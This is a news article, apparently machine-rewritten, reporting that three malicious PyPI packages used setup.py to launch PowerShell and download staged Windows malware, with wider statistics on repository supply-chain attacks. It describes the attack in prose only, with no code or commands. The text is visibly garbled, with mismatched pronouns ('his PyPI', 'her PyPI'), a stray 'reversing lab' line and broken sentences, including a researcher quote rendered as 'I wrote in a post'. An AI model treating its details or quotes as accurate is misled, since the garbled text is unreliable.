
Researchers have discovered another supply chain attack targeting open source code repositories.
This time the repository was PyPI (short for Python Package Index), the official software repository for the Python programming language. Earlier this month, a contributor with the username Lolip0p uploaded his three packages titled colorslib, httpslib, and libhttps to her PyPI. The contributor took care to disguise all three as legitimate packages, in this case libraries for creating terminal user interfaces and thread-safe connection pooling. All three packages were advertised as offering full-featured ease of use.



Researchers at security firm Fortinet say all three packages are malicious and have identical setup.py scripts. The file opened a Powershell window and downloaded a malicious file called Oxzy.exe. This file was detected only by 3 antimalware providers he at the time of discovery.
reversing lab
Oxzy.exe then downloaded a second malicious file named Update.exe. This file was only detected by 7 antimalware engines.

The last file dropped was named SearchProtocolHost.exe and was detected by 9 engines.

One of those engines was Microsoft’s Defender. That description was his Wacatac.b!ml, a piece of malware that Microsoft said “allows malicious hackers to perform many actions of their choosing on your PC.” According to Trend Micro’s analysis, the Trojan has been around since at least 2019, spreading via pirated software available online.
Open source repositories such as PyPI and NPM are increasingly used as vectors for installing malware through supply chain attacks, spreading malicious software at the source of legitimate projects. According to security firm ReversingLabs, from 2018 to 2021, this type of attack increased nearly fourfold on NPM and nearly fivefold on PyPI. Between January and October last year, 1,493 malicious packages were uploaded to his PyPI and 6,977 malicious packages were uploaded to NPM.
Last September, the PyPI supply chain attack escalated. Attackers launch credential phishing attacks against PyPI contributors and, if successful, use access to compromised accounts to publish malware masquerading as the latest releases of legitimate projects associated with the accounts Did. Legitimate projects included Exotel and Spam. In contrast to malicious packages using names similar to well-known projects, these attacks were able to pollute the official sources of long-running projects. The attackers behind the attacks have been around since at least 2021.
“Python end users should always exercise extreme caution before downloading and running packages, especially packages from new authors,” ReversingLabs researchers said. I wrote in a post documenting the latest attack. “As you can see, publishing multiple packages in a short period of time does not indicate that the author is trustworthy.”
The same advice should apply to NPM, RubyGems, and virtually any other open source repository.